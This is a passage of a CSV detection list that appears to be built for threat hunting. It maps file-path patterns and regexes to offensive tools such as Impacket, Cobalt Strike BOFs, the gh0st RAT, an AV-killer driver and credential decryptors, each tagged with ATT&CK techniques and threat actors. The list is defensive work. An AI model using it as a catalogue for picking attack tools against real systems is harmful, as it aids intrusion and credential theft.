SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7378" "*/Get-OSTokenInformation.ps1*",".{0,1000}\/Get\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7379" "*/getPac.exe*",".{0,1000}\/getPac\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7380" "*/getPac.py*",".{0,1000}\/getPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7381" "*/GetPasswords.ps1*",".{0,1000}\/GetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","7382" "*/Get-ScheduledTaskComHandler.ps1*",".{0,1000}\/Get\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7383" 
"*/get-shucking.php*",".{0,1000}\/get\-shucking\.php.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","7384" "*/Get-SMBSigning.ps1*",".{0,1000}\/Get\-SMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","1","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","7385" "*/getST.py*",".{0,1000}\/getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7386" "*/getST2.py*",".{0,1000}\/getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7387" "*/get-system/getsystem.c*",".{0,1000}\/get\-system\/getsystem\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 
Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","7388" "*/Get-TGSCipher.ps1*",".{0,1000}\/Get\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7389" "*/getTGT.py*",".{0,1000}\/getTGT\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7390" "*/GetUserSPNs.py*",".{0,1000}\/GetUserSPNs\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7391" "*/GetWebDAVStatus_BOF/*",".{0,1000}\/GetWebDAVStatus_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","7392" "*/Get-WLAN-Keys.ps1*",".{0,1000}\/Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7393" "*/gh0st.exe*",".{0,1000}\/gh0st\.exe.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","7394" "*/gh0st.git*",".{0,1000}\/gh0st\.git.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","7395" 
"*/ghauri.git*",".{0,1000}\/ghauri\.git.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","7396" "*/ghauri.py*",".{0,1000}\/ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","7397" "*/ghauri/ghauri/*",".{0,1000}\/ghauri\/ghauri\/.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#linux","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","7398" "*/ghidra*",".{0,1000}\/ghidra.{0,1000}","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. 
Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Framework","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","N/A","10","56448","6313","2025-04-22T12:58:37Z","2019-03-01T03:27:48Z","7399" "*/GhostDriver.exe*",".{0,1000}\/GhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","7400" "*/GhostDriver.git*",".{0,1000}\/GhostDriver\.git.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","7401" "*/ghostdriver.sys*",".{0,1000}\/ghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","7402" "*/ghostfile.aspx*",".{0,1000}\/ghostfile\.aspx.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","7403" "*/GhostInTheNet.git*",".{0,1000}\/GhostInTheNet\.git.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate 
Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","7404" "*/GhostInTheNet.sh*",".{0,1000}\/GhostInTheNet\.sh.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","7405" "*/GhostInTheNet-master*",".{0,1000}\/GhostInTheNet\-master.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","7406" "*/GhostMapper.git*",".{0,1000}\/GhostMapper\.git.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","7407" "*/GhostMapper.sln*",".{0,1000}\/GhostMapper\.sln.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense 
Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","7408" "*/GhostMouse.exe*",".{0,1000}\/GhostMouse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7409" "*/ghostsocks.git*",".{0,1000}\/ghostsocks\.git.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","1","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","7410" "*/GhostTask.git*",".{0,1000}\/GhostTask\.git.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","7411" "*/gimmeSH.sh*",".{0,1000}\/gimmeSH\.sh.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. 
you just need to provide the platform. your Internet protocol address and your port number.","T1059 - T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","N/A","2","183","28","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z","7412" "*/giop-info.nse*",".{0,1000}\/giop\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7413" "*/GithubC2.git*",".{0,1000}\/GithubC2\.git.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","7519" "*/gkrellm-info.nse*",".{0,1000}\/gkrellm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7520" "*/glit.git*",".{0,1000}\/glit\.git.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","7521" "*/glit-cli*",".{0,1000}\/glit\-cli.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","#linux","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","7522" "*/glit-core*",".{0,1000}\/glit\-core.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","#linux","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","7523" "*/GlllPowerloader.git*",".{0,1000}\/GlllPowerloader\.git.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","7524" "*/GlllPowerLoader.py*",".{0,1000}\/GlllPowerLoader\.py.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","7525" "*/GlobalUnProtect.git*",".{0,1000}\/GlobalUnProtect\.git.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","1","N/A","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","7526" "*/globeimposter.profile*",".{0,1000}\/globeimposter\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit 
